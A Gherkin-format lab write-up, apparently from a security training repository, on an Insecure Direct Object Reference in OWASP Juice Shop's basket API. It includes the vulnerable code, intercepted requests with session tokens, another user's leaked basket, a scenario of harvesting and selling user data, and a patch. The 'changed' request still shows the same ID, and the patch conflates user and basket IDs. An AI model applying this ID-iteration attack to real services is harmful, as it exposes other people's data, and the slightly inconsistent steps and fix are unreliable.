## Version 1.4.2
## language: en

Feature:
  TOE:
    Juice-Shop
  Category:
    Insecure Direct Object Reference
  Location:
    /rest/basket/id - id (Parameter)
  CWE:
    CWE-639: Authorization Bypass Through User-Controlled Key
  Rule:
    REQ.096: https://fluidattacks.com/web/es/rules/096/
  Goal:
    Access another user's basket
  Recommendation:
    Implement proper access control

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running Juice-Shop in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  No id validation
    Given I see the code at "package.json"
    """
    ...
    module.exports = function retrieveBasket () {
      return (req, res, next) => {
        const id = req.params.id
        models.Basket.find({ where: { id }, include: [ { model: models.Product,
        paranoid: false } ] })
          .then(basket => {
            /* jshint eqeqeq:false */
            if (utils.notSolved(challenges.basketAccessChallenge)) {
              const user = insecurity.authenticatedUsers.from(req)
              if (user && id && id !== 'undefined' && user.bid != id) {
                // eslint-disable-line eqeqeq
                utils.solve(challenges.basketAccessChallenge)
              }
            }
            res.json(utils.queryResultToJson(basket))
          }).catch(error => {
            next(error)
          })
      }
    }
    ...
    """
    Then I see it returns the basket associated to the request's id parameter
    And doesn't check the user making the request is the actual id owner

  Scenario: Dynamic detection
  Accessing another user's basket
    Given I intercept a basket API request with Burp
    """
    GET /rest/basket/4 HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    Accept: application/json, text/plain, */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/
    Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzd
    WNjZXNzIiwiZGF0YSI6eyJpZCI6MTQsInVzZXJuYW1lIjoiIiwiZW1haWwiOiJhQGIuY29tIiwic
    GFzc3dvcmQiOiIzNzQwY2YzYjU0NWVmZTcyMTc3MzgzOTAxMmNlYzI2MCIsImlzQWRtaW4iOmZhb
    HNlLCJsYXN0TG9naW5JcCI6IjAuMC4wLjAiLCJwcm9maWxlSW1hZ2UiOiJkZWZhdWx0LnN2ZyIsI
    mNyZWF0ZWRBdCI6IjIwMTktMDEtMzEgMTM6NDI6MzUuNjM5ICswMDowMCIsInVwZGF0ZWRBdCI6I
    jIwMTktMDEtMzEgMTM6NDI6MzUuNjM5ICswMDowMCJ9LCJpYXQiOjE1NDg5NDIxNjIsImV4cCI6M
    TU0ODk2MDE2Mn0.xnRI_ABuRRLUlGy1ij9Y4NPaPtXhsEP9JSBfb5dn1Hc7-pyPdbDDaw_cKb-dF
    OIkl7G0mn41iXOmTBBbs3if_VN2-6dzqSwvVKwKzbTCFWQ4q19y78_FjrsFW9_oWMLc-Owvn-fBE
    QKfdOp4s0toYLG--10ALBRjxEVzcYJ4CsQ
    Connection: close
    Cookie: cookieconsent_status=dismiss; continueCode=eEzBZk51L8wpN6j2aomAZxHqh
    5i7uMcXuKh9MTkQGryRMl7XxQO9gnDJVv43; io=e43QXMBvMIwvVoDvAAAC; token=eyJhbGci
    OiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MTQ
    sInVzZXJuYW1lIjoiIiwiZW1haWwiOiJhQGIuY29tIiwicGFzc3dvcmQiOiIzNzQwY2YzYjU0NWV
    mZTcyMTc3MzgzOTAxMmNlYzI2MCIsImlzQWRtaW4iOmZhbHNlLCJsYXN0TG9naW5JcCI6IjAuMC4
    wLjAiLCJwcm9maWxlSW1hZ2UiOiJkZWZhdWx0LnN2ZyIsImNyZWF0ZWRBdCI6IjIwMTktMDEtMzE
    gMTM6NDI6MzUuNjM5ICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMTktMDEtMzEgMTM6NDI6MzUuNjM
    5ICswMDowMCJ9LCJpYXQiOjE1NDg5NDIxNjIsImV4cCI6MTU0ODk2MDE2Mn0.xnRI_ABuRRLUlGy
    1ij9Y4NPaPtXhsEP9JSBfb5dn1Hc7-pyPdbDDaw_cKb-dFOIkl7G0mn41iXOmTBBbs3if_VN2-6d
    zqSwvVKwKzbTCFWQ4q19y78_FjrsFW9_oWMLc-Owvn-fBEQKfdOp4s0toYLG--10ALBRjxEVzcYJ
    4CsQ
    If-None-Match: W/"9c-YNQAfNZCjOnO+UQSLVKjSQkOu80"
    """
    Then I notice the /4 parameter and try changing it
    """
    GET /rest/basket/4 HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    Accept: application/json, text/plain, */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/
    ...
    """
    Then I get returned the contents of another basket
    """
    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 507
    ETag: W/"1fb-xwEoT2KNgOrUuY49Pm6HgwP0mUg"
    Date: Thu, 31 Jan 2019 13:43:05 GMT
    Connection: close

    {"status":"success","data":{"id":3,"coupon":null,"createdAt":"2019-01-31T13:
    38:54.521Z","updatedAt":"2019-01-31T13:38:54.521Z","UserId":3,"Products":[{"
    id":5,"name":"Lemon Juice (500ml)","description":"Sour but full of vitamins.
    ","price":2.99,"image":"lemon_juice.jpg","createdAt":"2019-01-31T13:38:54.30
    3Z","updatedAt":"2019-01-31T13:38:54.303Z","deletedAt":null,"BasketItem":{"i
    d":5,"quantity":1,"createdAt":"2019-01-31T13:38:54.523Z","updatedAt":"2019-0
    1-31T13:38:54.523Z","BasketId":3,"ProductId":5}}]}}
    """

  Scenario: Exploitation
  Harvesting user data
    Given I know I can see other user's baskets
    Then I can iterate through user ID's and harvest user baskets
    Then I can sell this data to one of the application's competitors

  Scenario: Remediation
  Access control
    Given I patch the code like this
    """
    ...
    module.exports = function retrieveBasket () {
      return (req, res, next) => {
        const id = req.user.id
        models.Basket.find({ where: { id }, include: [ { model: models.Product,
        paranoid: false } ] })
          .then(basket => {
            /* jshint eqeqeq:false */
            if (utils.notSolved(challenges.basketAccessChallenge)) {
              const user = insecurity.authenticatedUsers.from(req)
              if (user && id && id !== 'undefined' && user.bid != id) {
                // eslint-disable-line eqeqeq
                utils.solve(challenges.basketAccessChallenge)
              }
            }
            res.json(utils.queryResultToJson(basket))
          }).catch(error => {
            next(error)
          })
      }
    }
    ...
    """
    Then the basket id is taken from the requesting user

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.1/10 (High) - AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.6/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.6/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-31
